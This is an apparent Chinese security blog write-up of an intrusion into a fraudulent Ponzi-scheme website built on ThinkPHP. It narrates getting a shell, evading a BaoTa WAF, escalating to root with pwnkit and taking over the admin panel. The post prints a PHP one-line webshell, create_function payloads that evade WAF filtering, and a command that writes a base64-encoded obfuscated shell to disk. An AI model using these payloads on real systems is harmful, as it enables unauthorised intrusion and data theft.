一次波折的违法资金盘渗透学习

✎ 阅读须知

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！

本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！

1. 缘由

技术可能有不太连续的地方，因为时间比较远了，文章可能不完整，将就着看吧。

技术核心还得是小绵羊师傅，膜拜！

大概在2年前的时候，根据消息，对某新开的违法资金盘进行渗透，整个过程一波三折，时间过去这么久了，在这里对整个经过进行脱敏之后和大家分享下。

在某一个诈骗群中，有一个新型的传销资金盘正在筹备中，该项目在某聊天工具群中发布消息进行洗脑：

image.png

在这里人家已经说了，就是资金盘，其中有很多人都是带着自己的所谓的下级去赚钱，实际上这些人都是托。

image.png

因为群会风控，所以骗子就会要求已经注册的会员到另外一个平台的群组里面去：

image.png

2. 渗透过程

2.1 getshell

因为违法盘是当天发的，渗透也是当天做的，通过二维码扫描，发现该站点为一个thinkphp的站点，而且爆出了版本信息：

image.png

image.png

服务器搭建在香港，并且存在cdn：

image.png

通过骗子提供的邀请链接，正常注册之后，进入普通用户后台：

image.png

进入后台之后，就展开一系列的信息搜集工作，此时对方站点存在cdn，但是不存在waf，通过一系列鼓捣之后，拿到了shell：

image.png

拿到shell之后，发现此时是www权限：

image.png

至此，getshell算是告一段路，在这里要说的是，当时由于麻痹大意，shell是php的最简单的一句话木马，没有做任何的免杀措施，当时因为很顺利，就去吃饭去了，吃完之后，再鼓捣。

2.2 优势宰我-寄

从下午18:00点发布的盘，基本上18:30拿到了shell，尝试提权失败，然后就稍微休息了一下，吃完饭回来，大概不到19:00的样子，shell连不上了，而且上了强力waf：

尝试漏洞利用的时候，发现寄：

image.png

但是原来的一句话木马还在，直接访问当时的一句话木马文件，可以访问到，但是当执行命令的时候，对方使用了宝塔，而且还有cdn，只要是访问有异常，直接封禁。

寄

image.png

只要是有一条不正确，直接大寄：

寄

image.png

2.3 峰回路转

整理下思路：

目前遇到的漏洞利用点被宝塔禁了，但是上面还有一句话木马在，能连是能连，但是执行操作就会寄，虽然存在cdn，但是通过报错，获取到了服务器的真实ip。

image.png

我滴工作基本就到这了，后面就是小绵羊师傅来操作的：

耗费了很多时间之后，求教了小绵羊师傅，通过师傅一番操作之后，通过php的一句话木马，顺利执行得到了phpinfo信息：

一句话木马：
<?php @eval($_POST[a])?>

小绵羊师傅用下面的一句话获得phpinfo：

post:
a=$url="php";$p="info();";$c=$url.$p;$s= create_function('',$c);$s();

image.png

再利用php的input协议，得到了一个新的免杀shell：

a=$url="file";$p="_put_contents('a.php',base64_decode('b24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8%2BCg%3D%3D'));";$c=$url.$p;$s= create_function('',$c);$s();

冰蝎马get：

image.png

最后通过命令执行反弹得到了一个shell：

image.png

但是这个shell好像不太聪明，限制太多，肯定就是宝塔的基操了，在这里运气不错，通过pwnkit提权成功，获取到了root权限：

image.png

然后通过宝塔的后渗透操作，到了后台：

image.png

在这里默认密码都修改了，最后是新增用户上去的：

image.png

2.4 数据部分

资金盘基操：站库分离

后台拿到了源码之后，经过分析，找到了数据库的地址，通过代码临时替换了管理员密码，登录后台成功：

image.png

3.总结

在这个里面很多地方都是省略了，其实中间蛮曲折的，骗子是非常专业的，他们的运维也是非常专业的。

他们的站点可能有几十个，专业行骗，专骗老幼和宝妈，非常可恶！